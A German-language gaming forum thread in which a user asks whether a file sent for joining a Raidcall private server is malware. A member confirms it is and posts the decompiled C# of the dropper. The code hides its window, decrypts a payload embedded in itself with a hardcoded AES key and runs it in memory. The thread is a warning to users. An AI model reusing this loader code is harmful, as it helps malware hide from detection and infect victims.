Register for your free account! | Forgot your password?

Go Back   elitepvpers > Off-Topics > Off Topic
You last visited: Today at 10:36

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Raidcall Privat Server = Virus?

Discussion on Raidcall Privat Server = Virus? within the Off Topic forum part of the Off-Topics category.

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Feb 2011
Posts: 67
Received Thanks: 6
Raidcall Privat Server = Virus?

Hey, Ich habe mir heute Raidcall runtergeladen um mit ein Paar Leuten Counter Strike zu spielen ( sie haben mich in ihren clan oder wie mans nennen möchte eingeladen )

Als Ich es fertig gedownlaodet hatte, meinte der eine, dass Ich eine Datei, aus seiner Dropbox, downloaden soll um auf deren Privat Server zu kommen:
[Link entfernt, damit es niemand Downloaded]

Habe sie mir Gedownloadet und in Virustotal Prüfen lassen:


Stimmt es, dass es nur zum Verbinden ist oder ist das ein Virus oder ein Steam Keylogger oder ähnliches?
dragonbloot is offline  
Old 12/18/2014, 14:39   #2


 
Requi's Avatar
 
elite*gold: 3800
The Black Market: 244/0/0
Join Date: Dec 2012
Posts: 13,039
Received Thanks: 8,243
Ist ein Virus. Holt sich die Bytes des eigentlichen Virus' aus den Resourcen vom Programm und führt es dann aus.

Code:
public byte[] docinho(byte[] D8bw)
        {
            string str = ".";
            Activator.CreateInstance(AppDomain.CurrentDomain.Load(D8bw).GetType(string.Concat("PE", str, "PE")));
            return null;
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            string[] strArrays = Strings.Split(File.ReadAllText(Assembly.GetExecutingAssembly().Location), string.Concat("i", this.kokozi), -1, CompareMethod.Binary);
            this.docinho(this.putaya(Convert.FromBase64String(strArrays[1]), "jP4svMBpSY2ZM2SP"));
        }

        public byte[] GetBytes(string str)
        {
            return Encoding.Default.GetBytes(str);
        }

        [DebuggerStepThrough]
        private void InitializeComponent()
        {
            this.SuspendLayout();
            this.AutoScaleDimensions = new SizeF(6f, 13f);
            this.AutoScaleMode = AutoScaleMode.Font;
            this.ClientSize = new Size(124, 0);
            this.Name = "Form1";
            this.Opacity = 0;
            this.ShowInTaskbar = false;
            this.Text = "Bagod";
            this.ResumeLayout(false);
        }

        public byte[] putaya(byte[] input, string pass)
        {
            byte[] numArray;
            MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();
            try
            {
                byte[] numArray1 = new byte[32];
                byte[] numArray2 = mD5CryptoServiceProvider.ComputeHash(this.GetBytes(pass));
                Array.Copy(numArray2, 0, numArray1, 0, 16);
                Array.Copy(numArray2, 0, numArray1, 15, 16);
                this.pobinho.Key = numArray1;
                this.pobinho.Mode = CipherMode.ECB;
                ICryptoTransform cryptoTransform = this.pobinho.CreateDecryptor();
                byte[] numArray3 = input;
                numArray = cryptoTransform.TransformFinalBlock(numArray3, 0, checked((int)numArray3.Length));
            }
            catch (Exception exception)
            {
                ProjectData.SetProjectError(exception);
                ProjectData.ClearProjectError();
                return null;
            }
            return numArray;
        }
Requi is offline  
Old 12/18/2014, 14:39   #3
 
Hurt Locker's Avatar
 
elite*gold: 171
Join Date: Nov 2012
Posts: 10,419
Received Thanks: 2,845
einfach sein lassen und fertig
Hurt Locker is offline  
Old 12/18/2014, 14:40   #4
 
elite*gold: 0
Join Date: Feb 2011
Posts: 67
Received Thanks: 6
Gut, dass ichs nicht geöffnet hab ^^
dragonbloot is offline  
Old 12/18/2014, 14:45   #5


 
Requi's Avatar
 
elite*gold: 3800
The Black Market: 244/0/0
Join Date: Dec 2012
Posts: 13,039
Received Thanks: 8,243
Wär nett, wenn du den Download Link noch entfernst, dass sich niemand infizierst.
Requi is offline  
Old 12/18/2014, 15:00   #6
 
elite*gold: 0
Join Date: Feb 2011
Posts: 67
Received Thanks: 6
Okay, werd ich machen ^^
dragonbloot is offline  
Reply


Similar Threads Similar Threads
Raidcall - Die Credits....
04/16/2014 - Off Topic - 3 Replies
Wozu sind diese gott verdammten Credits gut? Ich hab im Internet alles mögliche danach gesucht. Ist das nur aus "Spaß"? Oder kann man mit denen was anfangen?
Raidcall server for you the Community
04/20/2013 - League of Legends - 0 Replies
Hy dudes and dudedins If you need a Communicate server then download "the raidcall" client make a account and come to my 300 slot server the ID is 6048284 ! ! ! For win-user: RaidCall 100% kostenlose Gruppen Kommunikations Software, Gruppen Kommunikation und Voice Chat For mac-user:RaidCall for Mac EDIT: If you have a 5 man or woman group you can have a own room
Fnatic RaidCall Raffle & GIVEAWAY
10/16/2012 - League of Legends Trading - 3 Replies
A couple months back Fnatic RaidCall did a raffle for people who voted and liked their Facebook fan page. Well, here's another for your chance to win prizes as well as win some guaranteed prizes! Link: The Greatest - RaidCall Win things like: Fnatic Mousepad Fnatic T-Shirts



All times are GMT +2. The time now is 10:36.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.